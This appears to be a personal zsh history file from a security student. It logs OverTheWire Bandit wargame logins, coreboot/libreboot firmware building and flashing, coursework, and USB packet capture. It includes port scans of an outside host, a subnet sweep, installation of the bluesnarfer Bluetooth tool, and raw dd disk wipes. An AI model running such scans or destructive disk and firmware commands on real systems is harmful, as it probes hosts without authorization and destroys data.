: 1538155370:0;ssh -p 2220 bandit3@bandit.labs.overthewire.org
: 1538155404:0;ssh -p 2220 bandit4@bandit.labs.overthewire.org
: 1538155476:0;ssh -p 2220 bandit5@bandit.labs.overthewire.org
: 1538155855:0;ssh -p 2220 bandit6@bandit.labs.overthewire.org
: 1538156148:0;ssh -p 2220 bandit7@bandit.labs.overthewire.org
: 1538156202:0;ssh -p 2220 bandit8@bandit.labs.overthewire.org
: 1538157309:0;ssh -p 2220 bandit9@bandit.labs.overthewire.org
: 1538157641:0;ssh -p 2220 bandit10@bandit.labs.overthewire.org
: 1538157816:0;ssh -p 2220 bandit11@bandit.labs.overthewire.org
: 1538157919:0;ssh -p 2220 bandit12@bandit.labs.overthewire.org
: 1538158502:0;ssh -p 2220 bandit13@bandit.labs.overthewire.org
: 1538160400:0;nano ssh-priv.txt
: 1538160455:0;chmod 600 ssh-priv.txt
: 1538160505:0;ssh -p 2220 bandit18@bandit.labs.overthewire.org
: 1538160551:0;ssh -p 2220 bandit18@bandit.labs.overthewire.org 'cat readme'
: 1538160614:0;ssh -p 2220 bandit19@bandit.labs.overthewire.org
: 1538161922:0;gnome-terminal
: 1538161929:0;ssh -p 2220 bandit20@bandit.labs.overthewire.org
: 1538162269:0;nc bandit.labs.overthewire.org 1234
: 1538162884:0;ssh -p 2220 bandit21@bandit.labs.overthewire.org
: 1538163346:0;ssh -p 2220 bandit22@bandit.labs.overthewire.org
: 1538163609:0;ssh -i ssh-priv.txt -p 2220 bandit17@bandit.labs.overthewire.org
: 1538163651:0;ssh -p 2220 bandit23@bandit.labs.overthewire.org
: 1538165381:0;ssh -p 2220 bandit24@bandit.labs.overthewire.org
: 1538177178:0;ssh -p 2220 bandit25@bandit.labs.overthewire.org
: 1538178450:0;ssh -p 2220 bandit26@bandit.labs.overthewire.org
: 1538179086:0;ssh -p 2220 bandit27@bandit.labs.overthewire.org
: 1538179716:0;ssh -p 2220 bandit28@bandit.labs.overthewire.org
: 1538180092:0;ssh -p 2220 bandit29@bandit.labs.overthewire.org
: 1538180616:0;ssh -p 2220 bandit30@bandit.labs.overthewire.org
: 1538181327:0;ssh -p 2220 bandit31@bandit.labs.overthewire.org
: 1538182839:0;$SHELL=
: 1538182840:0;ssh -p 2220 bandit32@bandit.labs.overthewire.org
: 1538496046:0;sudo apt install curl
: 1538496171:0;curl -sq https://fastly.cdn.openbsd.org/pub/OpenBSD/snapshots/amd64 | grep "bsd.rd" | awk '{print $3}'
: 1538496187:0;curl -sq https://fastly.cdn.openbsd.org/pub/OpenBSD/snapshots/amd64 | grep "bsd.rd"
: 1538496191:0;man curl
: 1538496209:0;curl --help
: 1538496228:0;curl -q https://fastly.cdn.openbsd.org/pub/OpenBSD/snapshots/amd64 | grep "bsd.rd"
: 1538496238:0;curl - https://fastly.cdn.openbsd.org/pub/OpenBSD/snapshots/amd64 | grep "bsd.rd"
: 1538496244:0;curl https://fastly.cdn.openbsd.org/pub/OpenBSD/snapshots/amd64 | grep "bsd.rd"
: 1538522993:0;sudo dd if=Downloads/2018-06-27-raspbian-stretch-lite.img of=/dev/sdb bs=1M status=progress
: 1538525765:0;cd Downloads/libreboot_r20160907_util/ich9deblob/x86_64
: 1538525789:0;./ich9gen --macaddress 00:1f:16:21:20:47
: 1538526029:0;cd libreboot_r20160907_util/ich9deblob/x86_64
: 1538526073:0;dd if=ich9fdgbe_4m.bin of=/home/artificial/work/x200_4mb_usqwerty_vesafb.rom bs=1 count=12k conv=notrunc status=progress
: 1538531976:0;cd libreboot_r20160907_util
: 1538532160:0;cd ../work
: 1538532203:0;../libreboot_r20160907_util/cbfstool/x86_64/cbfstool x200_4mb_usqwerty_vesafb.rom remove background.png
: 1538532215:0;../libreboot_r20160907_util/cbfstool/x86_64/cbfstool x200_4mb_usqwerty_vesafb.rom remove background.png -n background.png
: 1538532264:0;../libreboot_r20160907_util/cbfstool/x86_64/cbfstool x200_4mb_usqwerty_vesafb.rom remove -n background.png
: 1538532301:0;../libreboot_r20160907_util/cbfstool/x86_64/cbfstool x200_4mb_usqwerty_vesafb.rom remove -n background.jpg
: 1538532394:0;mv 8274204009_fcf9ce8068_h.jpg background.jpg
: 1538532437:0;../libreboot_r20160907_util/cbfstool/x86_64/cbfstool x200_4mb_usqwerty_vesafb.rom add -f background.jpg -t raw
: 1538532476:0;../libreboot_r20160907_util/cbfstool/x86_64/cbfstool x200_4mb_usqwerty_vesafb.rom add -f background.jpg -n background.jpg -t raw
: 1538532481:0;../libreboot_r20160907_util/cbfstool/x86_64/cbfstool x200_4mb_usqwerty_vesafb.rom print
: 1538532762:0;scp ~/work/x200_4mb_usqwerty_vesafb.rom pi@172.16.5.169:~/x200
: 1538538367:0;dd if=install63.fs of=/dev/sdb bs=1m status=progress
: 1538576802:0;cd Documents/projects/cybr2250/
: 1538576809:0;mkdir assign-3
: 1538576813:0;cd assign-
: 1538576814:0;cd assign-3
: 1538579478:0;cd ../assign-1
: 1538579481:0;nano store.c
: 1538579542:0;cd ../assign-3
: 1538579547:0;cd ../assign-2
: 1538579818:0;cd Documents/projects/cybr2250/assign-2
: 1538579824:0;nano enigma.c
: 1538579836:0;nano ../assign-1
: 1538579838:0;nano ../assign-1/store.c
: 1538580626:0;nano flights.c
: 1538586589:0;host http://rocket.alefir.net/
: 1538586592:0;ping http://rocket.alefir.net/
: 1538586598:0;ping rocket.alefir.net
: 1538586612:0;nmap -Pn rocket.alefir.net
: 1538586934:0;nmap -p- rocket.alefir.net
: 1538587658:0;gcc -Wall -std=c1x -o flight flight.c
: 1538587683:0;gcc -Wall -std=c1x -o flights flights.c
: 1538588855:0;nano ~/.vimrc
: 1538592092:0;nano ../assign-3/flights.txt
: 1538592243:0;cd ~/CLionProjects/untitled
: 1538592251:0;./main.c
: 1538592303:0;nano main.c
: 1538593577:0;nano flights.txt
: 1538595406:0;gdb flights.txt
: 1538601617:0;gcc -Wall -std=c1x -o main main.c
: 1538601620:0;gdb main
: 1538604845:0;rm main
: 1538604865:0;mv MakeFile Makefile
: 1538605841:0;nano Makefile
: 1538660255:0;cd ~/bi
: 1538660258:0;cd ~/bin
: 1538660262:0;cd
: 1538660320:0;sudo wget https://www.privateinternetaccess.com/openvpn/openvpn.zip
: 1538699029:0;cd CLionProjects/untitled
: 1538699054:0;./main
: 1538699061:0;./main flights.txt
: 1538783293:0;file *.so
: 1538783307:0;chmod +x libclient_c*
: 1538783313:0;./libclient_comms.so
: 1538783317:0;./libclient_comms.so ls
: 1538783322:0;./libclient_crypt.so
: 1538783328:0;xxd libclient_crypt.so
: 1538783334:0;strings libclient_crypt.so
: 1538783360:0;strings libclient_comms.so
: 1539013111:0;nano ~/.zshrc
: 1539013154:0;nano ~/.tmux.conf
: 1539014932:0;git-update
: 1539014943:0;full-upgrade
: 1539021974:0;find ./ -name "openbsd"
: 1539022005:0;cd Downloads
: 1539022066:0;dd if=install63.fs of=/dev/sdb bs=1M status=progress
: 1539022186:0;umount /dev/sdb
: 1539022189:0;sudo umount /dev/sdb
: 1539022209:0;sudo umount /dev/sdb*
: 1539022220:0;sudo dd if=install63.fs of=/dev/sdb bs=1M status=progress
: 1539022247:0;fdisk -l
: 1539022250:0;sudo fdisk -l
: 1539022265:0;fdisk /dev/sdb
: 1539022268:0;sudo fdisk /dev/sdb
: 1539027129:0;ssh pi@172.16.5.169
: 1539027148:0;nmap 
: 1539027162:0;ip a
: 1539027196:0;nmap -sP 172.16.5.0/20
: 1539029302:0;exit
: 1539043184:0;git clone https://review.coreboot.org/coreboot
: 1539043790:0;sudo apt-get install -y bison build-essential curl flex git gnat-5 libncurses5-dev m4 zlib1g-dev\

: 1539046732:0;ls 3rdparty/blobs
: 1539046742:0;git submodule update
: 1539046770:0;git clone https://review.coreboot.org/p/blobs.git
: 1539046810:0;lsblk
: 1539046812:0;ls blobs
: 1539046847:0;ls coreboot/3rdparty/blobs
: 1539046863:0;cp blobs/* coreboot/3rdparty/blobs
: 1539046867:0;cp -r blobs/* coreboot/3rdparty/blobs
: 1539047198:0;scp pi@172.16.8.123:~/vendor.rom ./
: 1539047212:0;scp pi@172.16.8.123:~/x200/vendor.rom ./
: 1539047309:0;cd util/bincfg
: 1539047351:0;./bincfg ifd-x200.spec ifd-x200.set ifd.bin
: 1539047361:0;nano ifd-x200.set
: 1539047413:0;dd if=/dev/zero of=padding.bin bs=$((4 * 1024 * 1024 - 4096)) count=1
: 1539047423:0;cat ifd.bin padding.bin > ifd_4M.bin
: 1539047442:0;flashrom -p linux_spi:dev=/dev/spidev0.0,spispeed=128 -w ifd_8M.bin --ifd --image fd --noverify-all
: 1539048036:0;make iasl
: 1539048127:0;ls build
: 1539063547:0;git clone https://github.com/coreboot/seabios
: 1539063578:0;rm -rf coreboot/payloads/external/SeaBIOS/seabios/*
: 1539063592:0;cp seabios/* coreboot/payloads/external/SeaBIOS/seabios
: 1539063597:0;cp -r seabios/* coreboot/payloads/external/SeaBIOS/seabios
: 1539063603:0;ls coreboot/payloads/external/SeaBIOS/seabios
: 1539063646:0;make help
: 1539063657:0;make clean
: 1539063712:0;git reset --hard
: 1539063756:0;rm -rf coreboot
: 1539063764:0;git clone https://github.com/coreboot/coreboot
: 1539063812:0;git submodule update --init --checkout
: 1539063998:0;nano payloads/external/SeaBIOS/Makefile
: 1539064211:0;cd /tmp
: 1539064216:0;sudo rm -rf seabios
: 1539064228:0;git clone https://review.coreboot.org/seabios
: 1539064289:0;git checkout 3130a93bfa953011fed7429b17d3727abd3b4100
: 1539064305:0;git submodule update --checkout
: 1539064386:0;sudo apt-get install git build-essential gnat flex bison libncurses5-dev wget zlib1g-dev
: 1539064880:0;make crossgcc-i386 GPUS=$(nproc)
: 1539067760:0;make
: 1539068422:0;~
: 1539068459:0;scp -r ./build pi@172.16.8.123:~/x200/coreboot
: 1539102573:0;sudo apt autoremove
: 1539102621:0;apt-get purge gnat flex bison libncurses5-dev zlib1g-dev
: 1539102623:0;sudo apt-get purge gnat flex bison libncurses5-dev zlib1g-dev
: 1539102676:0;git clone https://notabug.org/libreboot/libreboot.git
: 1539102819:0;cd libreboot
: 1539102832:0;./oldbuild dependencies trisquel7
: 1539102835:0;sudo ./oldbuild dependencies trisquel7
: 1539103148:0;cd ..
: 1539107091:0;ls
: 1539107096:0;cd coreboot
: 1539107139:0;make nconfig
: 1539107166:0;sudo apt-get install git
: 1539108539:0;ssh pi@172.16.8.123
: 1539110561:0;cd 
: 1539130589:0;sudo dmesg
: 1539131523:0;sudo apt install wireshark
: 1539131731:0;sudo wireshark
: 1539131782:0;modprobe usbmon
: 1539131785:0;sudo modprobe usbmon
: 1539131800:0;echo $USER
: 1539131804:0;sudo setfacl -m u:$USER:r /dev/usbmon* 
: 1539131810:0;sudo setfacl -m u:artificial:r /dev/usbmon* 
: 1539131820:0;sudo wireshark
: 1539132007:0;sudo dmesg
: 1539132015:0;cat /usr/include/asm-generic/errno.h | grep '71'
: 1539132403:0;nano /etc/default/grub
: 1539132425:0;sudo nano /etc/default/grub
: 1539132445:0;sudo update-grub
: 1539132455:0;reboot
: 1539132596:0;sudo dmesg
: 1539132829:0;sudo wireshark
: 1539132845:0;sudo modprobe usbmon
: 1539132847:0;sudo wireshark
: 1539133387:0;sudo dmesg
: 1539133394:0;sudo rmmod xhci_hcd
: 1539133449:0;sudo dmesg
: 1539140770:0;sudo apt install bluesnarfer
: 1539182198:0;full-upgrade
: 1539182737:0;sudo apt install mg
: 1539182794:0;mg
: 1539182879:0;ls
: 1539182893:0;rm libreboot_r20160907_*
: 1539182894:0;ls
: 1539182898:0;cat ssh-priv.txt
: 1539182900:0;rm ssh-priv.txt
: 1539182901:0;ls
: 1539182908:0;mv bandit.txt Documents
: 1539182919:0;file Feel.pcapng
: 1539182931:0;mv Feel.pcapng Documents
: 1539209086:0;ssh 172.16.10.150
: 1539209173:0;myip
: 1539209180:0;cat myip
: 1539209185:0;cat myip()\

: 1539209192:0;cat .zshrc
: 1539209378:0;ssh 98.171.203.235
: 1539209394:0;myip
: 1539209422:0;ssh 98.171.203.235
: 1539209426:0;ping google.com
: 1539209433:0;nmap 98.171.203.235
: 1539209557:0;myip
: 1539209783:0;ip a
: 1539209831:0;ip a~
: 1539209832:0;ip a
: 1539209896:0;scp -r 172.16.10.150:/var/mail/artificial ~/mail
: 1539209901:0;ls
: 1539209905:0;ls mail
: 1539209915:0;scp -r 172.16.10.150:/var/mail/artificial ~/
: 1539209919:0;ls
: 1539209923:0;cat artificial
: 1539209939:0;cat mail| more
: 1539210832:0;ssh 172.16.10.150
: 1539214030:0;scp ~/CLionProjects/CYBR2250001_P3 ftursi@loki.ist.unomaha.edu:~/
: 1539214041:0;scp -r ~/CLionProjects/CYBR2250001_P3 ftursi@loki.ist.unomaha.edu:~/
: 1539214053:0;ssh ftursi@loki.ist.unomaha.edu
: 1539222717:0;ssh 172.16.10.150
: 1539288043:0;lsblk
: 1539288060:0;dd if=/dev/zero of=/dev/sdb
: 1539288062:0;sudo dd if=/dev/zero of=/dev/sdb
: 1539288086:0;ls
: 1539288095:0;sudo dd if=/dev/zero of=/dev/sdb status=progress
: 1539289681:0;find ./ -name "iso"
: 1539289706:0;find ./ -name "*iso"
: 1539313761:0;full-upgrade
: 1539358360:0;ls
: 1539358364:0;ls Documents
: 1539358371:0;cd /tmp
: 1539358377:0;git clone https://gitlab.com/ArtificialAmateur/dot-files
: 1539358382:0;cd dot-files
: 1539358383:0;ls
: 1539358401:0;cp ~/.tmux ./
: 1539358407:0;cp -r ~/.tmux ./
: 1539358408:0;ls
: 1539358421:0;cp -r ~/.zsh ./
